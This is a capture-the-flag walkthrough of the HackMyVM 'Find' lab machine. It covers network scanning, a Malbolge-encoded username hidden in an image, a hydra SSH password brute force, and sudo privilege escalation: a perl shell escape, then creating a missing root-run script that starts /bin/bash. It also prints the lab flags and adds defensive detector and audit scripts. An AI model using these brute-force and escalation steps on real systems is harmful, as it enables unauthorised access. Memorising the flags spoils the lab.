
HackMyVM-Find

Information gathering

Host discovery

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:39:60:4c, IPv4: 192.168.43.126
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.43.1    c6:45:66:05:91:88       (Unknown: locally administered)
192.168.43.137  08:00:27:d0:6b:60       PCS Systemtechnik GmbH
192.168.43.197  04:6c:59:bd:33:50       Intel Corporate

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.955 seconds (130.95 hosts/sec). 3 responded

Port scanning

┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -p- 192.168.43.137
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-28 05:14 EDT
Nmap scan report for find (192.168.43.137)
Host is up (0.000085s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:D0:6B:60 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.95 seconds
┌──(root㉿kali)-[~]
└─# nmap -sT -sV -O -p22,80 192.168.43.137      
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-28 05:17 EDT
Nmap scan report for find (192.168.43.137)
Host is up (0.00023s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
MAC Address: 08:00:27:D0:6B:60 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.68 seconds

Exploitation

Let's see what is on port 80.

[image]

Directory enumeration

┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.43.137 -w /home/kali/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x html,php,txt,jpg,png,zip,git
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.43.137
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/kali/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              git,html,php,txt,jpg,png,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10701]
/cat.jpg              (Status: 200) [Size: 35137]
/manual               (Status: 301) [Size: 317] [--> http://192.168.43.137/manual/]                                                                       
/robots.txt           (Status: 200) [Size: 13]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
/logitech-quickcam_w0qqcatrefzc5qqfbdz1qqfclz3qqfposz95112qqfromzr14qqfrppz50qqfsclz1qqfsooz1qqfsopz1qqfssz0qqfstypez1qqftrtz1qqftrvz1qqftsz2qqnojsprzyqqpfidz0qqsaatcz1qqsacatzq2d1qqsacqyopzgeqqsacurz0qqsadisz200qqsaslopz1qqsofocuszbsqqsorefinesearchz1.html (Status: 403) [Size: 279]
Progress: 9482032 / 9482040 (100.00%)
===============================================================
Finished
===============================================================

/robots.txt

[image]

/cat.jpg: download the image and look inside it; it contains a strange-looking string:

>C<;_"!~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJ`_dcba`_^]\Uy<XW
VOsrRKPONGk.-,+*)('&%$#"!~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONML
KJIHGFEDZY^W\[ZYXWPOsSRQPON0Fj-IHAeR

From someone else's writeup I learned that this is the Malbolge programming language; use https://malbolge.doleczek.pl/ to see what it says.
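The string can also be decoded offline. The following is an added example, not code from the original writeup or from the web tool it names: a small Malbolge interpreter in Python that follows the semantics of the reference interpreter (10-trit words modulo 59049, the XLAT1 decode table keyed on the code position, XLAT2 re-encryption of the executed cell, and the tritwise "crazy" operation). The HELLO_WORLD constant is the well-known public Malbolge hello-world program, embedded only as a sanity check; the string from cat.jpg must be pasted into a file by hand because the copy above has been damaged by line wrapping.

```python
"""Minimal Malbolge interpreter (added example, not from the original writeup).

Implements the semantics of the reference interpreter: 10-trit words modulo
59049, registers a/c/d, instruction decoding through XLAT1 keyed on the
current code position, re-encryption of the executed cell through XLAT2,
and the 'crazy' tritwise operation.
"""
import sys

MOD = 59049  # 3 ** 10, the size of a Malbolge word and of memory

# Instruction decode table: XLAT1[(cell - 33 + c) % 94] is the opcode
XLAT1 = ('+b(29e*j1VMEKLyC})8&m#~W>qxdRp0wkrUo[D7,XTcA"lI.v%{gJh4G\\-=O@5`_3i<?Z'
         "';FNQuY]szf$!BS/|t:Pn6^Ha")
# Post-execution encryption table: cell = XLAT2[cell - 33]
XLAT2 = ("5z]&gqtyfr$(we4{WP)H-Zn,[%\\3dL+Q;>U!pJS72FhOA1CB6v^=I_0/8|jsb9m<.TVac`uY*MK'X~xDl}REokN:#?G"
         '"i@')
assert len(XLAT1) == 94 and len(XLAT2) == 94
OPCODES = "ji*p</vo"

# The 'crazy' operation on single trits, indexed [y_trit][x_trit]
_CRZ = ((1, 0, 0), (1, 0, 2), (2, 2, 1))


def crazy(x, y):
    """Tritwise crazy operation on two 10-trit words (reference op(x, y))."""
    result, weight = 0, 1
    for _ in range(10):
        result += _CRZ[(y // weight) % 3][(x // weight) % 3] * weight
        weight *= 3
    return result


def load(src):
    """Validate the program text and build the 59049-word memory image."""
    mem = []
    for ch in src:
        if ch.isspace():
            continue
        x = ord(ch)
        if not 33 <= x <= 126 or XLAT1[(x - 33 + len(mem)) % 94] not in OPCODES:
            raise ValueError(f"invalid Malbolge character {ch!r} at offset {len(mem)}")
        mem.append(x)
    if len(mem) < 2:
        raise ValueError("program too short")
    while len(mem) < MOD:  # rest of memory: crazy of the two previous cells
        mem.append(crazy(mem[-1], mem[-2]))
    return mem


def run_malbolge(src, stdin=b"", max_steps=1_000_000):
    """Execute a Malbolge program and return everything it wrote to stdout."""
    mem = load(src)
    a = c = d = 0
    inp = iter(stdin)
    out = bytearray()
    for _ in range(max_steps):
        if not 33 <= mem[c] <= 126:  # the reference build spins here; we stop instead
            break
        op = XLAT1[(mem[c] - 33 + c) % 94]
        if op == "j":
            d = mem[d]
        elif op == "i":
            c = mem[d]
        elif op == "*":  # rotate the word right by one trit
            a = mem[d] = mem[d] // 3 + (mem[d] % 3) * 19683
        elif op == "p":
            a = mem[d] = crazy(a, mem[d])
        elif op == "<":
            out.append(a % 256)
        elif op == "/":
            a = next(inp, MOD - 1)  # EOF reads as 59048
        elif op == "v":
            break
        # 'o' and anything else is a no-op.  As in the reference, the cell at the
        # (possibly just jumped-to) c is re-encrypted before c and d advance.
        if 33 <= mem[c] <= 126:
            mem[c] = ord(XLAT2[mem[c] - 33])
        c = (c + 1) % MOD
        d = (d + 1) % MOD
    return bytes(out)


# Well-known public Malbolge hello-world program, used here only as a sanity check.
HELLO_WORLD = ('(=<`#9]~6ZY327Uv4-QsqpMn&+Ij"\'E%e{Ab~w=_:]Kw%o44Uqp0/Q?xNvL:`H%c#DD2^WV>gY;'
               "dts76qKJImZkj")

if __name__ == "__main__":
    # Usage: python3 malbolge.py < program.mb   (paste the string from cat.jpg into program.mb)
    program = sys.stdin.read() if not sys.stdin.isatty() else HELLO_WORLD
    sys.stdout.write(run_malbolge(program).decode("latin-1"))
```

Whitespace is ignored on load, so a program split across lines is fine; any other character that does not decode to a valid opcode at its position raises ValueError, which is the quickest way to tell that a copied string has been altered in transit.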

[image]

This should be the username, so brute-force SSH with it.

┌──(kali㉿kali)-[~]
└─$ hydra -l missyred -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.43.137 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-28 10:56:08
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.43.137:22/
[22][ssh] host: 192.168.43.137   login: missyred   password: iloveyou
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-28 10:56:14
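Seen from the target, a hydra run like the one above is hard to miss: the sshd log fills with "Failed password" lines from one source address within a few seconds, followed by an "Accepted password" for the same user. The following detector is an added example and is not part of the original writeup. The log lines it runs over are constructed to mirror that burst (host name, source address, user, PIDs and timestamps are made up for the sample), and the threshold and window values are arbitrary defaults.

```python
"""Detect SSH password brute-forcing in sshd auth-log lines (added example, not from the writeup).

Counts 'Failed password' events per source address inside a sliding time window and
raises an alert when the count reaches a threshold; an 'Accepted password' from a
source that is still inside such a burst is flagged separately, because that is the
event the attacker is waiting for.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Matches the two sshd password-auth outcomes in the default syslog line format.
LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2"
)


def parse_line(line, year=2025):
    """Return (timestamp, result, user, ip) for a password-auth line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(lines, threshold=10, window=60):
    """Sliding-window detector; returns a list of alert tuples in log order."""
    failures = defaultdict(deque)  # source ip -> timestamps of recent failures
    alerts = []
    for line in lines:
        event = parse_line(line)
        if event is None:
            continue
        ts, result, user, ip = event
        recent = failures[ip]
        while recent and (ts - recent[0]).total_seconds() > window:
            recent.popleft()  # forget failures older than the window
        if result == "Failed":
            recent.append(ts)
            if len(recent) == threshold:  # alert once, when the burst crosses the line
                alerts.append(("BRUTE_FORCE", ip, len(recent), ts))
        elif len(recent) >= threshold:  # a success while the burst is still live
            alerts.append(("SUCCESS_AFTER_BURST", ip, user, ts))
    return alerts


# Constructed sample (not real log data from the target): twelve failed logins in six
# seconds from one source, then a success from the same source, plus one unrelated
# normal login from elsewhere.
SAMPLE_LOG = [
    f"May 28 10:56:{8 + i // 2:02d} find sshd[{1200 + i}]: Failed password for missyred "
    f"from 192.168.43.126 port {51234 + i} ssh2"
    for i in range(12)
] + [
    "May 28 10:56:14 find sshd[1213]: Accepted password for missyred from 192.168.43.126 port 51246 ssh2",
    "May 28 10:57:01 find sshd[1300]: Accepted password for kings from 192.168.43.50 port 40000 ssh2",
]

if __name__ == "__main__":
    # Usage: python3 ssh_bruteforce.py < /var/log/auth.log   (falls back to the sample)
    import sys
    source = sys.stdin.read().splitlines() if not sys.stdin.isatty() else SAMPLE_LOG
    for alert in detect_bruteforce(source):
        print(*alert)
```

The year is supplied by the caller because the default syslog timestamp omits it; a production version would also reset the window at year boundaries and would key on the user as well as the source, since a distributed attack can stay under the per-address threshold.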

Privilege escalation

Look for anything that can be used for privilege escalation.

missyred@find:~$ sudo -l
[sudo] password for missyred: 
Matching Defaults entries for missyred on find:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User missyred may run the following commands on find:
    (kings) /usr/bin/perl
missyred@find:~$ cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
missyred:x:1001:1001::/home/missyred:/bin/bash
kings:x:1002:1006::/home/kings:/bin/bash

[image]

Successfully escalated to kings.

missyred@find:~$ sudo -u kings /usr/bin/perl -e ' exec "/bin/sh";'
$ id
uid=1002(kings) gid=1006(kings) groups=1006(kings),1005(kingg)

user.txt

$ cat user.txt
f4e690f638c01bd8a19fb1349d40519c

Look for something that can be used to escalate further.

$ cat user.txt
f4e690f638c01bd8a19fb1349d40519c
$ sudo -l
Matching Defaults entries for kings on find:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User kings may run the following commands on find:
    (ALL) NOPASSWD: /opt/boom/boom.sh
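Both sudo -l listings in this writeup are misconfigurations an administrator can find before anyone else does: missyred may run an interpreter (/usr/bin/perl) as kings, and kings may run /opt/boom/boom.sh as root without a password even though neither the script nor its directory exists, so whoever can create /opt/boom supplies the code that sudo will run as root. The following audit script is an added example, not code from the original writeup. It parses rule lines in the format printed by sudo -l and flags interpreters, missing targets whose nearest existing ancestor directory the user can write, and existing targets with a user-writable file or path component. The SHELL_CAPABLE set, the finding codes and the explicit uid/gid parameters are this example's own choices.

```python
"""Audit 'sudo -l' rules for weak command targets (added example, not from the writeup)."""
import os
import re
import stat
from dataclasses import dataclass

# Interpreters and editors that can hand back a shell when allowed via sudo (assumed list).
SHELL_CAPABLE = {"perl", "python", "python3", "ruby", "bash", "sh", "vi", "vim", "awk"}

# One rule line as printed by sudo -l, e.g. "    (ALL) NOPASSWD: /opt/boom/boom.sh"
_RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)")


@dataclass(frozen=True)
class SudoRule:
    runas: str
    nopasswd: bool
    command: str


def parse_sudo_l(text):
    """Extract (runas, NOPASSWD, command) from the rule lines of 'sudo -l' output."""
    rules = []
    for line in text.splitlines():
        m = _RULE_RE.match(line)
        if m:
            rules.append(SudoRule(m["runas"].strip(), "NOPASSWD:" in m["tags"], m["cmd"]))
    return rules


def _writable_by(st, uid, gids):
    """Can a process with this uid and group set write to the inode described by st?"""
    if uid == 0:
        return True
    mode = st.st_mode
    if st.st_uid == uid:            # owner bits apply, and only they apply
        return bool(mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)


def _nearest_existing(path):
    """Walk up from a missing path to the first component that exists."""
    while not os.path.lexists(path):
        parent = os.path.dirname(path)
        if parent == path:
            break
        path = parent
    return path


def audit_command(command, uid, gids):
    """Return a list of (code, detail) findings for one sudo command target."""
    findings = []
    if command == "ALL":
        return [("ALL", "rule allows any command")]
    if os.path.basename(command) in SHELL_CAPABLE:
        findings.append(("INTERPRETER", f"{command} can spawn a shell as the run-as user"))
    if not os.path.lexists(command):
        anc = _nearest_existing(command)
        if _writable_by(os.stat(anc), uid, gids):
            findings.append(("MISSING_CREATABLE",
                             f"{command} does not exist and {anc} is writable by uid {uid}: "
                             "the user can create the target"))
        else:
            findings.append(("MISSING", f"{command} does not exist (rule is inert until root creates it)"))
        return findings
    # Target exists: the file and every directory above it must be root-controlled, otherwise
    # the user can replace the file or swap out a path component.  Sticky directories such
    # as /tmp are skipped because other users' entries cannot be renamed there.
    path = command
    while True:
        st = os.lstat(path)
        sticky_dir = stat.S_ISDIR(st.st_mode) and bool(st.st_mode & stat.S_ISVTX)
        if _writable_by(st, uid, gids) and not sticky_dir:
            findings.append(("WRITABLE_PATH", f"{path} is writable by uid {uid}"))
        parent = os.path.dirname(path)
        if parent == path:
            break
        path = parent
    return findings


def audit_sudo_l(text, uid, gids):
    """Audit every rule in a 'sudo -l' dump; returns {command: [findings]}."""
    return {r.command: audit_command(r.command, uid, gids) for r in parse_sudo_l(text)}


if __name__ == "__main__":
    # Usage, run as the user being audited:  sudo -l | python3 sudo_audit.py
    import sys
    for cmd, found in audit_sudo_l(sys.stdin.read(), os.getuid(), set(os.getgroups())).items():
        for code, detail in found:
            print(f"{cmd}: [{code}] {detail}")
```

Run against the two listings above, the script reports INTERPRETER for /usr/bin/perl and MISSING_CREATABLE for /opt/boom/boom.sh whenever /opt is writable by the user; a rule that passes all three checks still deserves a look at what the allowed program does with its arguments.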

Privilege escalation to root

kings@find:~$ cd /opt
kings@find:/opt$ ls
kings@find:/opt$
kings@find:/opt$ mkdir /opt/boom
kings@find:/opt$ cd /opt/boom
kings@find:/opt/boom$ echo "/bin/bash" > /opt/boom/boom.sh
kings@find:/opt/boom$ chmod +x /opt/boom/boom.sh
kings@find:/opt/boom$ sudo /opt/boom/boom.sh
root@find:/opt/boom# id
uid=0(root) gid=0(root) groups=0(root)

root.txt

root@find:~# cat root.txt 
c8aaf0f3189e000006c305bbfcbeb790
